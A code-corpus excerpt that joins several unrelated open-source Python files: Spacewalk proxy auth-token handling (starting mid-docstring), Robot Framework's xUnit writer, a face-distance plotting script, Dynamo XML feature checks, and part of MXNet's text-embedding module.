An Spacewalk Proxy auth token is a token fetched upon login from
Red Hat Satellite or hosted.
It has this format:
'S:U:ST:EO:SIG'
Where:
S = server ID
U = username
ST = server time
EO = expiration offset
SIG = signature
H = hostname (important later)
Within this function within the Spacewalk Proxy Broker we also tag on
the hostname to the end of the token. The token as described above
is enough for authentication purposes, but we need a to identify
the exact hostname (as the Spacewalk Proxy sees it). So now the token
becomes (token:hostname):
'S:U:ST:EO:SIG:H'
DESIGN NOTES: what is X-RHN-Proxy-Auth?
-------------------------------------------
This is where we use the auth token beyond Spacewalk Proxy login
purposes. This a header used to track request routes through
a hierarchy of RHN Proxies.
X-RHN-Proxy-Auth is a header that passes proxy authentication
information around in the form of an ordered list of tokens. This
list is used to gain information as to how a client request is
routed throughout an RHN topology.
Format: 'S1:U1:ST1:EO1:SIG1:H1,S2:U2:ST2:EO2:SIG2:H2,...'
|_________1_________| |_________2_________| |__...
token token
where token is really: token:hostname
leftmost token was the first token hit by a client request.
rightmost token was the last token hit by a client request.
"""
# pylint: disable=R0915
log_debug(3)
server = self.__getXmlrpcServer()
error = None
token = None
# update the systemid/serverid if need be.
self.__processSystemid()
# Makes three attempts to login
for _i in range(self.__nRetries):
try:
token = server.proxy.login(self.__systemid)
except (socket.error, socket.sslerror), e:
if CFG.HTTP_PROXY:
# socket error, check to see if your HTTP proxy is running...
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
httpProxy, httpProxyPort = CFG.HTTP_PROXY.split(':')
try:
s.connect((httpProxy, int(httpProxyPort)))
except socket.error, e:
error = ['socket.error', 'HTTP Proxy not running? '
'(%s) %s' % (CFG.HTTP_PROXY, e)]
# rather big problem: http proxy not running.
log_error("*** ERROR ***: %s" % error[1])
Traceback(mail=0)
except socket.sslerror, e:
error = ['socket.sslerror',
'(%s) %s' % (CFG.HTTP_PROXY, e)]
# rather big problem: http proxy not running.
log_error("*** ERROR ***: %s" % error[1])
Traceback(mail=0)
else:
error = ['socket', str(e)]
log_error(error)
Traceback(mail=0)
else:
log_error("Socket error", e)
Traceback(mail=0)
Traceback(mail=1)
token = None
time.sleep(.25)
continue
except SSL.SSL.Error, e:
token = None
error = ['rhn.SSL.SSL.Error', repr(e), str(e)]
log_error(error)
Traceback(mail=0)
time.sleep(.25)
continue
except xmlrpclib.ProtocolError, e:
token = None
log_error('xmlrpclib.ProtocolError', e)
time.sleep(.25)
continue
except xmlrpclib.Fault, e:
# Report it through the mail
# Traceback will try to walk over all the values
# in each stack frame, and eventually will try to stringify
# the method object itself
# This should trick it, since the originator of the exception
# is this function, instead of a deep call into xmlrpclib
log_error("%s" % e)
if e.faultCode == 10000:
# reraise it for the users (outage or "important message"
# coming through")
raise rhnFault(e.faultCode, e.faultString), None, sys.exc_info()[2]
# ok... it's some other fault
Traceback("ProxyAuth.login (Fault) - Spacewalk Proxy not "
"able to log in.")
# And raise a Proxy Error - the server made its point loud and
# clear
raise rhnFault(1000,
_("Spacewalk Proxy error (during proxy login). "
"Please contact your system administrator.")), None, sys.exc_info()[2]
except Exception, e: # pylint: disable=E0012, W0703
token = None
log_error("Unhandled exception", e)
Traceback(mail=0)
time.sleep(.25)
continue
else:
break
if not token:
if error:
if error[0] in ('xmlrpclib.ProtocolError', 'socket.error', 'socket'):
raise rhnFault(1000,
_("Spacewalk Proxy error (error: %s). "
"Please contact your system administrator.") % error[0])
if error[0] in ('rhn.SSL.SSL.Error', 'socket.sslerror'):
raise rhnFault(1000,
_("Spacewalk Proxy error (SSL issues? Error: %s). "
"Please contact your system administrator.") % error[0])
else:
raise rhnFault(1002, err_text='%s' % e)
else:
raise rhnFault(1001)
if self.hostname:
token = token + ':' + self.hostname
log_debug(6, "New proxy token: %s" % token)
return token
@staticmethod
def get_client_token(clientid):
shelf = get_auth_shelf()
if shelf.has_key(clientid):
return shelf[clientid]
return None
@staticmethod
def set_client_token(clientid, token):
shelf = get_auth_shelf()
shelf[clientid] = token
def update_client_token_if_valid(self, clientid, token):
# Maybe a load-balanced proxie and client logged in through a
# different one? Ask upstream if token is valid. If it is,
# upate cache.
# copy to simple dict for transmission. :-/
dumbToken = {}
satInfo = None
for key in ('X-RHN-Server-Id', 'X-RHN-Auth-User-Id', 'X-RHN-Auth',
'X-RHN-Auth-Server-Time', 'X-RHN-Auth-Expire-Offset'):
if token.has_key(key):
dumbToken[key] = token[key]
try:
s = self.__getXmlrpcServer()
satInfo = s.proxy.checkTokenValidity(
dumbToken, self.get_system_id())
except Exception: # pylint: disable=E0012, W0703
pass # Satellite is not updated enough, keep old behavior
# False if not valid token, a dict of info we need otherwise
# We have to calculate the proxy-clock-skew between Sat and this
# Proxy, as well as store the subscribed channels for this client
# (which the client does not pass up in headers and which we
# wouldn't trust even if it did).
if satInfo:
clockSkew = time.time() - float(satInfo['X-RHN-Auth-Server-Time'])
dumbToken['X-RHN-Auth-Proxy-Clock-Skew'] = clockSkew
dumbToken['X-RHN-Auth-Channels'] = satInfo['X-RHN-Auth-Channels']
# update our cache so we don't have to ask next time
self.set_client_token(clientid, dumbToken)
return dumbToken
return None
# __private methods__
@staticmethod
def __getXmlrpcServer():
""" get an xmlrpc server object
WARNING: if CFG.USE_SSL is off, we are sending info
in the clear.
"""
log_debug(3)
# build the URL
url = CFG.RHN_PARENT or ''
url = parseUrl(url)[1].split(':')[0]
if CFG.USE_SSL:
url = 'https://' + url + '/XMLRPC'
else:
url = 'http://' + url + '/XMLRPC'
log_debug(3, 'server url: %s' % url)
if CFG.HTTP_PROXY:
serverObj = rpclib.Server(url,
proxy=CFG.HTTP_PROXY,
username=CFG.HTTP_PROXY_USERNAME,
password=CFG.HTTP_PROXY_PASSWORD)
else:
serverObj = rpclib.Server(url)
if CFG.USE_SSL and CFG.CA_CHAIN:
if not os.access(CFG.CA_CHAIN, os.R_OK):
log_error('ERROR: missing or cannot access (for ca_chain): %s' % CFG.CA_CHAIN)
raise rhnFault(1000,
_("Spacewalk Proxy error (file access issues). "
"Please contact your system administrator. "
"Please refer to Spacewalk Proxy logs."))
serverObj.add_trusted_cert(CFG.CA_CHAIN)
serverObj.add_header('X-RHN-Client-Version', 2)
return serverObj
def __cache_proxy_key(self):
return 'p' + str(self.__serverid) + sha1(self.hostname).hexdigest()
def getProxyServerId(self):
return self.__serverid
def get_auth_shelf():
if CFG.USE_LOCAL_AUTH:
return AuthLocalBackend()
server, port = CFG.AUTH_CACHE_SERVER.split(':')
port = int(port)
return rhnAuthCacheClient.Shelf((server, port))
class AuthLocalBackend:
_cache_prefix = "proxy-auth"
def __init__(self):
pass
def has_key(self, key):
rkey = self._compute_key(key)
return rhnCache.has_key(rkey)
def __getitem__(self, key):
rkey = self._compute_key(key)
# We want a dictionary-like behaviour, so if the key is not present,
# raise an exception (that's what missing_is_null=0 does)
val = rhnCache.get(rkey, missing_is_null=0)
return val
def __setitem__(self, key, val):
rkey = self._compute_key(key)
return rhnCache.set(rkey, val)
def __delitem__(self, key):
rkey = self._compute_key(key)
return rhnCache.delete(rkey)
def _compute_key(self, key):
return os.path.join(self._cache_prefix, str(key))
def __len__(self):
pass
# ==============================================================================
| lhellebr/spacewalk | proxy/proxy/rhnProxyAuth.py | Python | gpl-2.0 | 18,014 |
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from robotide.lib.robot.result.visitor import ResultVisitor
from robotide.lib.robot.utils import XmlWriter
class XUnitWriter(object):
def __init__(self, execution_result, skip_noncritical):
self._execution_result = execution_result
self._skip_noncritical = skip_noncritical
def write(self, output):
writer = XUnitFileWriter(XmlWriter(output, encoding='UTF-8'), self._skip_noncritical)
self._execution_result.visit(writer)
class XUnitFileWriter(ResultVisitor):
"""Provides an xUnit-compatible result file.
Attempts to adhere to the de facto schema guessed by Peter Reilly, see:
http://marc.info/?l=ant-dev&m=123551933508682
"""
def __init__(self, xml_writer, skip_noncritical=False):
self._writer = xml_writer
self._root_suite = None
self._skip_noncritical = skip_noncritical
def start_suite(self, suite):
if self._root_suite:
return
self._root_suite = suite
tests, failures, skip = self._get_stats(suite.statistics)
attrs = {'name': suite.name,
'tests': tests,
'errors': '0',
'failures': failures,
'skip': skip}
self._writer.start('testsuite', attrs)
def _get_stats(self, statistics):
if self._skip_noncritical:
failures = statistics.critical.failed
skip = statistics.all.total - statistics.critical.total
else:
failures = statistics.all.failed
skip = 0
return str(statistics.all.total), str(failures), str(skip)
def end_suite(self, suite):
if suite is self._root_suite:
self._writer.end('testsuite')
def visit_test(self, test):
self._writer.start('testcase',
{'classname': test.parent.longname,
'name': test.name,
'time': self._time_as_seconds(test.elapsedtime)})
if self._skip_noncritical and not test.critical:
self._skip_test(test)
elif not test.passed:
self._fail_test(test)
self._writer.end('testcase')
def _skip_test(self, test):
self._writer.element('skipped', '%s: %s' % (test.status, test.message)
if test.message else test.status)
def _fail_test(self, test):
self._writer.element('failure', attrs={'message': test.message,
'type': 'AssertionError'})
def _time_as_seconds(self, millis):
return str(int(round(millis, -3) / 1000))
def visit_keyword(self, kw):
pass
def visit_statistics(self, stats):
pass
def visit_errors(self, errors):
pass
def end_result(self, result):
self._writer.close()
| fingeronthebutton/RIDE | src/robotide/lib/robot/reporting/xunitwriter.py | Python | apache-2.0 | 3,461 |
#!/usr/bin/env python
#
# This file is part of the Fun SDK (fsdk) project. The complete source code is
# available at https://github.com/luigivieira/fsdk.
#
# Copyright (c) 2016-2017, Luiz Carlos Vieira (http://www.luiz.vieira.nom.br)
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import os
import csv
import argparse
import numpy as np
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn import preprocessing
#---------------------------------------------
def main(argv):
"""
Main entry point of this utility application.
This is simply a function called by the checking of namespace __main__, at
the end of this script (in order to execute only when this script is ran
directly).
Parameters
------
argv: list of str
Arguments received from the command line.
"""
annotationsPath = 'C:/Users/luigi/Dropbox/Doutorado/dataset/annotation-all'
#annotationsPath = 'C:/temp/teste'
print('Reading data...')
data = {}
for dirpath, _, filenames in os.walk(annotationsPath):
for f in filenames:
name = os.path.splitext(f)[0]
parts = name.split('-')
if len(parts) != 2 or parts[1] != 'face':
continue
subject = int(parts[0].split('_')[1])
fileName = os.path.join(dirpath, f)
print('\tfile {}...'.format(fileName))
# Read the distance data
with open(fileName, 'r', newline='') as file:
reader = csv.DictReader(file, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL)
times = []
distances = []
gradients = []
for row in reader:
times.append(int(row['frame']) / 30 / 60)
distances.append(float(row['face.distance']))
gradients.append(float(row['face.gradient']))
data[subject] = {'times': times, 'distances': distances,
'gradients': gradients}
print('Plotting data...')
subjects = list(data.keys())
values = list(data.values())
fig, axes = plt.subplots(5, 7, sharex = True, sharey = True)
shared = None
for i, subject in enumerate(subjects):
row = i // 7
col = i % 7
axis = axes[row, col]
times = values[i]['times']
distances = values[i]['distances']
gradients = values[i]['gradients']
svDist = 0
svGrad = 0
for j in range(len(times)):
if distances[j] == 0:
distances[j] = svDist
svDist = distances[j]
if gradients[j] == 0:
gradients[j] = svGrad
svGrad = gradients[j]
axis.set_title(subject)
axis.plot(times, distances, lw=1.5)
axis.set_xlim([0, 10])
axis.xaxis.grid(False)
mng = plt.get_current_fig_manager()
mng.window.state('zoomed')
#fig.text(0.1, 0.5, 'Gradient of the Face Distance (in Centimeters)',
fig.text(0.1, 0.5, 'Face Distance (in Centimeters)',
va='center', rotation='vertical', fontsize=15)
fig.text(0.5, 0.055, 'Video Progress (in Minutes)', ha='center', fontsize=15)
plt.show()
#---------------------------------------------
def plotData(axis, frames, distances, gradients):
"""
Plot the data of a subject.
Parameters
----------
axis: matplotlib.axis
Axis of the figure or subfigure where to plot the data.
frames: list
List of frame numbers of the subject.
distances: list
List of facial distances of the subject.
gradients: list
List of distance gradients of the subject.
"""
#failed = [frames[i] for i in range(len(frames)) if fails[i]]
# if len(failed) > 0:
# areas = []
# start = failed[0]
# end = failed[0]
# for i in range(1, len(failed)):
# if (failed[i] - failed[i-1]) == 1:
# end = failed[i]
# else:
# areas.append((start, end))
# start = failed[i]
# end = failed[i]
# areas.append((start, end))
# Generate a time list for plotting
fps = 30
time = [(f / 60 / fps) for f in frames]
start = 0 # 5 * 60 * fps # Start the plots at 5 minutes
axis.set_xlim([0, 10])
axis.set_ylim([-10, 10])
#axis.set_yticks([0, 0.5, 1])
axis.plot(time[start:], gradients[start:], 'b', lw=1.5)
#axis.plot(time[start:], involvement[start:], 'r', lw=1.5)
#for start, end in areas:
# plt.axvspan(start / 30 / 60, end / 30 / 60, color='red', alpha=0.5)
#plt.axvspan(9750, frames[-1], color='blue', alpha=0.2)
#---------------------------------------------
# namespace verification for invoking main
#---------------------------------------------
if __name__ == '__main__':
main(sys.argv[1:]) | luigivieira/fsdk | fsdk/reports/distances.py | Python | mit | 6,011 |
# Feature extractors for XML files ( 0 < Dynamo < 2)
import xml.etree.ElementTree as ET
def getVersion(b64decodedData):
et = ET.fromstring(b64decodedData)
version = et.attrib["Version"]
return version
def usesListAtLevel(data):
usesList = data.find('useLevels="True"') > -1
return usesList
def hasHiddenNodes(data):
return data.find('isVisible="false"') > -1
def hasUpstreamHiddenNodes(data):
return data.find('isUpstreamVisible="false"') > -1
def hasShortestLacing(data):
return data.find('lacing="Shortest"') > -1
def hasLongestLacing(data):
return data.find('lacing="Longest"') > -1
def hasDisabledLacing(data):
return data.find('lacing="Disabled"') > -1
def hasCrossProductLacing(data):
return data.find('lacing="CrossProduct"') > -1
def hasPinned(data):
return data.find('isPinned="true"') > -1
def hasFrozen(data):
return data.find('IsFrozen="true"') > -1 # sic IsFrozen
| DynamoDS/Coulomb | SessionTools/features_XML.py | Python | mit | 941 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=consider-iterating-dictionary
# pylint: disable=super-init-not-called
"""Text token embeddings."""
from __future__ import absolute_import
from __future__ import print_function
import io
import logging
import os
import tarfile
import warnings
import zipfile
from . import _constants as C
from . import vocab
from ... import ndarray as nd
from ... import registry
from ... import base
def register(embedding_cls):
"""Registers a new token embedding.
Once an embedding is registered, we can create an instance of this embedding with
:func:`~mxnet.contrib.text.embedding.create`.
Examples
--------
>>> @mxnet.contrib.text.embedding.register
... class MyTextEmbed(mxnet.contrib.text.embedding._TokenEmbedding):
... def __init__(self, pretrained_file_name='my_pretrain_file'):
... pass
>>> embed = mxnet.contrib.text.embedding.create('MyTokenEmbed')
>>> print(type(embed))
<class '__main__.MyTokenEmbed'>
"""
register_text_embedding = registry.get_register_func(_TokenEmbedding, 'token embedding')
return register_text_embedding(embedding_cls)
def create(embedding_name, **kwargs):
"""Creates an instance of token embedding.
Creates a token embedding instance by loading embedding vectors from an externally hosted
pre-trained token embedding file, such as those of GloVe and FastText. To get all the valid
`embedding_name` and `pretrained_file_name`, use
`mxnet.contrib.text.embedding.get_pretrained_file_names()`.
Parameters
----------
embedding_name : str
The token embedding name (case-insensitive).
Returns
-------
An instance of `mxnet.contrib.text.glossary._TokenEmbedding`:
A token embedding instance that loads embedding vectors from an externally hosted
pre-trained token embedding file.
"""
create_text_embedding = registry.get_create_func(_TokenEmbedding, 'token embedding')
return create_text_embedding(embedding_name, **kwargs)
def get_pretrained_file_names(embedding_name=None):
"""Get valid token embedding names and their pre-trained file names.
To load token embedding vectors from an externally hosted pre-trained token embedding file,
such as those of GloVe and FastText, one should use
`mxnet.contrib.text.embedding.create(embedding_name, pretrained_file_name)`.
This method returns all the valid names of `pretrained_file_name` for the specified
`embedding_name`. If `embedding_name` is set to None, this method returns all the valid
names of `embedding_name` with their associated `pretrained_file_name`.
Parameters
----------
embedding_name : str or None, default None
The pre-trained token embedding name.
Returns
-------
dict or list:
A list of all the valid pre-trained token embedding file names (`pretrained_file_name`)
for the specified token embedding name (`embedding_name`). If the text embeding name is
set to None, returns a dict mapping each valid token embedding name to a list of valid
pre-trained files (`pretrained_file_name`). They can be plugged into
`mxnet.contrib.text.embedding.create(embedding_name,
pretrained_file_name)`.
"""
text_embedding_reg = registry.get_registry(_TokenEmbedding)
if embedding_name is not None:
if embedding_name not in text_embedding_reg:
raise KeyError('Cannot find `embedding_name` %s. Use '
'`get_pretrained_file_names('
'embedding_name=None).keys()` to get all the valid embedding '
'names.' % embedding_name)
return list(text_embedding_reg[embedding_name].pretrained_file_name_sha1.keys())
else:
return {embedding_name: list(embedding_cls.pretrained_file_name_sha1.keys())
for embedding_name, embedding_cls in registry.get_registry(_TokenEmbedding).items()}
class _TokenEmbedding(vocab.Vocabulary):
"""Token embedding base class.
To load token embeddings from an externally hosted pre-trained token embedding file, such as
those of GloVe and FastText, use
:func:`~mxnet.contrib.text.embedding.create(embedding_name, pretrained_file_name)`.
To get all the available `embedding_name` and `pretrained_file_name`, use
:func:`~mxnet.contrib.text.embedding.get_pretrained_file_names()`.
Alternatively, to load embedding vectors from a custom pre-trained token embedding file, use
:class:`~mxnet.contrib.text.embedding.CustomEmbedding`.
Moreover, to load composite embedding vectors, such as to concatenate embedding vectors, use
:class:`~mxnet.contrib.text.embedding.CompositeEmbedding`.
For every unknown token, if its representation `self.unknown_token` is encountered in the
pre-trained token embedding file, index 0 of `self.idx_to_vec` maps to the pre-trained token
embedding vector loaded from the file; otherwise, index 0 of `self.idx_to_vec` maps to the
token embedding vector initialized by `init_unknown_vec`.
If a token is encountered multiple times in the pre-trained token embedding file, only the
first-encountered token embedding vector will be loaded and the rest will be skipped.
The indexed tokens in a text token embedding may come from a vocabulary or from the loaded
embedding vectors. In the former case, only the indexed tokens in a vocabulary are associated
with the loaded embedding vectors, such as loaded from a pre-trained token embedding file. In
the later case, all the tokens from the loaded embedding vectors, such as loaded from a
pre-trained token embedding file, are taken as the indexed tokens of the embedding.
Attributes
----------
token_to_idx : dict mapping str to int
A dict mapping each token to its index integer.
idx_to_token : list of strs
A list of indexed tokens where the list indices and the token indices are aligned.
unknown_token : hashable object
The representation for any unknown token. In other words, any unknown token will be indexed
as the same representation.
reserved_tokens : list of strs or None
A list of reserved tokens that will always be indexed.
vec_len : int
The length of the embedding vector for each token.
idx_to_vec : mxnet.ndarray.NDArray
For all the indexed tokens in this embedding, this NDArray maps each token's index to an
embedding vector. The largest valid index maps to the initialized embedding vector for every
reserved token, such as an unknown_token token and a padding token.
"""
def __init__(self, **kwargs):
super(_TokenEmbedding, self).__init__(**kwargs)
@classmethod
def _get_download_file_name(cls, pretrained_file_name):
return pretrained_file_name
@classmethod
def _get_pretrained_file_url(cls, pretrained_file_name):
repo_url = os.environ.get('MXNET_GLUON_REPO', C.APACHE_REPO_URL)
embedding_cls = cls.__name__.lower()
url_format = '{repo_url}gluon/embeddings/{cls}/{file_name}'
return url_format.format(repo_url=repo_url, cls=embedding_cls,
file_name=cls._get_download_file_name(pretrained_file_name))
@classmethod
def _get_pretrained_file(cls, embedding_root, pretrained_file_name):
from ...gluon.utils import check_sha1, download
embedding_cls = cls.__name__.lower()
embedding_root = os.path.expanduser(embedding_root)
url = cls._get_pretrained_file_url(pretrained_file_name)
embedding_dir = os.path.join(embedding_root, embedding_cls)
pretrained_file_path = os.path.join(embedding_dir, pretrained_file_name)
downloaded_file = os.path.basename(url)
downloaded_file_path = os.path.join(embedding_dir, downloaded_file)
expected_file_hash = cls.pretrained_file_name_sha1[pretrained_file_name]
if hasattr(cls, 'pretrained_archive_name_sha1'):
expected_downloaded_hash = \
cls.pretrained_archive_name_sha1[downloaded_file]
else:
expected_downloaded_hash = expected_file_hash
if not os.path.exists(pretrained_file_path) \
or not check_sha1(pretrained_file_path, expected_file_hash):
download(url, downloaded_file_path, sha1_hash=expected_downloaded_hash)
ext = os.path.splitext(downloaded_file)[1]
if ext == '.zip':
with zipfile.ZipFile(downloaded_file_path, 'r') as zf:
zf.extractall(embedding_dir)
elif ext == '.gz':
with tarfile.open(downloaded_file_path, 'r:gz') as tar:
tar.extractall(path=embedding_dir)
return pretrained_file_path
def _load_embedding(self, pretrained_file_path, elem_delim, init_unknown_vec, encoding='utf8'):
"""Load embedding vectors from the pre-trained token embedding file.
For every unknown token, if its representation `self.unknown_token` is encountered in the
pre-trained token embedding file, index 0 of `self.idx_to_vec` maps to the pre-trained token
embedding vector loaded from the file; otherwise, index 0 of `self.idx_to_vec` maps to the
text embedding vector initialized by `init_unknown_vec`.
If a token is encountered multiple times in the pre-trained text embedding file, only the
first-encountered token embedding vector will be loaded and the rest will be skipped.
"""
pretrained_file_path = os.path.expanduser(pretrained_file_path)
if not os.path.isfile(pretrained_file_path):
raise ValueError('`pretrained_file_path` must be a valid path to '
'the pre-trained token embedding file.')
logging.info('Loading pre-trained token embedding vectors from %s', pretrained_file_path)
vec_len = None
all_elems = []
tokens = set()
loaded_unknown_vec = None
line_num = 0
with io.open(pretrained_file_path, 'r', encoding=encoding) as f:
for line in f:
line_num += 1
elems = line.rstrip().split(elem_delim)
assert len(elems) > 1, 'At line %d of the pre-trained text embedding file: the ' \
'data format of the pre-trained token embedding file %s ' \
'is unexpected.' % (line_num, pretrained_file_path)
token, elems = elems[0], [float(i) for i in elems[1:]]
if token == self.unknown_token and loaded_unknown_vec is None:
loaded_unknown_vec = elems
tokens.add(self.unknown_token)
elif token in tokens:
warnings.warn('At line %d of the pre-trained token embedding file: the '
'embedding vector for token %s has been loaded and a duplicate '
'embedding for the same token is seen and skipped.' %
(line_num, token))
elif len(elems) == 1:
warnings.warn('At line %d of the pre-trained text embedding file: token %s '
'with 1-dimensional vector %s is likely a header and is '
'skipped.' % (line_num, token, elems))
else:
if vec_len is None:
vec_len = len(elems)
# Reserve a vector slot for the unknown token at the very beggining because
# the unknown index is 0.
all_elems.extend([0] * vec_len)
else:
assert len(elems) == vec_len, \
'At line %d of the pre-trained token embedding file: the dimension ' \
'of token %s is %d but the dimension of previous tokens is %d. ' \
'Dimensions of all the tokens must be the same.' \
% (line_num, token, len(elems), vec_len)
all_elems.extend(elems)
self._idx_to_token.append(token)
self._token_to_idx[token] = len(self._idx_to_token) - 1
tokens.add(token)
self._vec_len = vec_len
self._idx_to_vec = nd.array(all_elems).reshape((-1, self.vec_len))
if loaded_unknown_vec is None:
self._idx_to_vec[C.UNKNOWN_IDX] = init_unknown_vec(shape=self.vec_len)
else:
self._idx_to_vec[C.UNKNOWN_IDX] = nd.array(loaded_unknown_vec)
def _index_tokens_from_vocabulary(self, vocabulary):
self._token_to_idx = vocabulary.token_to_idx.copy() \
if vocabulary.token_to_idx is not None else None
self._idx_to_token = vocabulary.idx_to_token[:] \
if vocabulary.idx_to_token is not None else None
self._unknown_token = vocabulary.unknown_token
self._reserved_tokens = vocabulary.reserved_tokens[:] \
if vocabulary.reserved_tokens is not None else None
def _set_idx_to_vec_by_embeddings(self, token_embeddings, vocab_len, vocab_idx_to_token):
"""Sets the mapping between token indices and token embedding vectors.
Parameters
----------
token_embeddings : instance or list `mxnet.contrib.text.embedding._TokenEmbedding`
One or multiple pre-trained token embeddings to load. If it is a list of multiple
embeddings, these embedding vectors will be concatenated for each token.
vocab_len : int
Length of vocabulary whose tokens are indexed in the token embedding.
vocab_idx_to_token: list of str
A list of indexed tokens in the vocabulary. These tokens are indexed in the token
embedding.
"""
new_vec_len = sum(embed.vec_len for embed in token_embeddings)
new_idx_to_vec = nd.zeros(shape=(vocab_len, new_vec_len))
col_start = 0
# Concatenate all the embedding vectors in token_embeddings.
for embed in token_embeddings:
col_end = col_start + embed.vec_len
# Cancatenate vectors of the unknown token.
new_idx_to_vec[0, col_start:col_end] = embed.idx_to_vec[0]
new_idx_to_vec[1:, col_start:col_end] = embed.get_vecs_by_tokens(vocab_idx_to_token[1:])
col_start = col_end
self._vec_len = new_vec_len
self._idx_to_vec = new_idx_to_vec
def _build_embedding_for_vocabulary(self, vocabulary):
if vocabulary is not None:
assert isinstance(vocabulary, vocab.Vocabulary), \
'The argument `vocabulary` must be an instance of ' \
'mxnet.contrib.text.vocab.Vocabulary.'
# Set _idx_to_vec so that indices of tokens from vocabulary are associated with the
# loaded token embedding vectors.
self._set_idx_to_vec_by_embeddings([self], len(vocabulary), vocabulary.idx_to_token)
# Index tokens from vocabulary.
self._index_tokens_from_vocabulary(vocabulary)
@property
def vec_len(self):
return self._vec_len
@property
def idx_to_vec(self):
return self._idx_to_vec
def get_vecs_by_tokens(self, tokens, lower_case_backup=False):
"""Look up embedding vectors of tokens.
Parameters
----------
tokens : str or list of strs
A token or a list of tokens.
lower_case_backup : bool, default False
If False, each token in the original case will be looked up; if True, each token in the
original case will be looked up first, if not found in the keys of the property
`token_to_idx`, the token in the lower case will be looked up.
Returns
-------
mxnet.ndarray.NDArray:
The embedding vector(s) of the token(s). According to numpy conventions, if `tokens` is
a string, returns a 1-D NDArray of shape `self.vec_len`; if `tokens` is a list of
strings, returns a 2-D NDArray of shape=(len(tokens), self.vec_len).
"""
to_reduce = False
if not isinstance(tokens, list):
tokens = [tokens]
to_reduce = True
if not lower_case_backup:
indices = [self.token_to_idx.get(token, C.UNKNOWN_IDX) for token in tokens]
else:
indices = [self.token_to_idx[token] if token in self.token_to_idx
else self.token_to_idx.get(token.lower(), C.UNKNOWN_IDX)
for token in tokens]
vecs = nd.Embedding(nd.array(indices), self.idx_to_vec, self.idx_to_vec.shape[0],
self.idx_to_vec.shape[1])
return vecs[0] if to_reduce else vecs
def update_token_vectors(self, tokens, new_vectors):
"""Updates embedding vectors for tokens.
Parameters
----------
tokens : str or a list of strs
A token or a list of tokens whose embedding vector are to be updated.
new_vectors : mxnet.ndarray.NDArray
An NDArray to be assigned to the embedding vectors of `tokens`. Its length must be equal
to the number of `tokens` and its width must be equal to the dimension of embeddings of
the glossary. If `tokens` is a singleton, it must be 1-D or 2-D. If `tokens` is a list
of multiple strings, it must be 2-D.
"""
assert self.idx_to_vec is not None, 'The property `idx_to_vec` has not been properly set.'
if not isinstance(tokens, list) or len(tokens) == 1:
assert isinstance(new_vectors, nd.NDArray) and len(new_vectors.shape) in [1, 2], \
'`new_vectors` must be a 1-D or 2-D NDArray if `tokens` is a singleton.'
if not isinstance(tokens, list):
tokens = [tokens]
if len(new_vectors.shape) == 1:
new_vectors = new_vectors.expand_dims(0)
else:
assert isinstance(new_vectors, nd.NDArray) and len(new_vectors.shape) == 2, \
'`new_vectors` must be a 2-D NDArray if `tokens` is a list of multiple strings.'
assert new_vectors.shape == (len(tokens), self.vec_len), \
'The length of new_vectors must be equal to the number of tokens and the width of' \
'new_vectors must be equal to the dimension of embeddings of the glossary.'
indices = []
for token in tokens:
if token in self.token_to_idx:
indices.append(self.token_to_idx[token])
else:
raise ValueError('Token %s is unknown. To update the embedding vector for an '
'unknown token, please specify it explicitly as the '
'`unknown_token` %s in `tokens`. This is to avoid unintended '
'updates.' % (token, self.idx_to_token[C.UNKNOWN_IDX]))
self._idx_to_vec[nd.array(indices)] = new_vectors
@classmethod
def _check_pretrained_file_names(cls, pretrained_file_name):
"""Checks if a pre-trained token embedding file name is valid.
Parameters
----------
pretrained_file_name : str
The pre-trained token embedding file.
"""
embedding_name = cls.__name__.lower()
if pretrained_file_name not in cls.pretrained_file_name_sha1:
raise KeyError('Cannot find pretrained file %s for token embedding %s. Valid '
'pretrained files for embedding %s: %s' %
(pretrained_file_name, embedding_name, embedding_name,
', '.join(cls.pretrained_file_name_sha1.keys())))
@register
class GloVe(_TokenEmbedding):
"""The GloVe word embedding.
GloVe is an unsupervised learning algorithm for obtaining vector representations for words.
Training is performed on aggregated global word-word co-occurrence statistics from a corpus, and
the resulting representations showcase interesting linear substructures of the word vector
space. (Source from https://nlp.stanford.edu/projects/glove/)
References
----------
GloVe: Global Vectors for Word Representation.
Jeffrey Pennington, Richard Socher, and Christopher D. Manning.
https://nlp.stanford.edu/pubs/glove.pdf
Website:
https://nlp.stanford.edu/projects/glove/
To get the updated URLs to the externally hosted pre-trained token embedding
files, visit https://nlp.stanford.edu/projects/glove/
License for pre-trained embeddings:
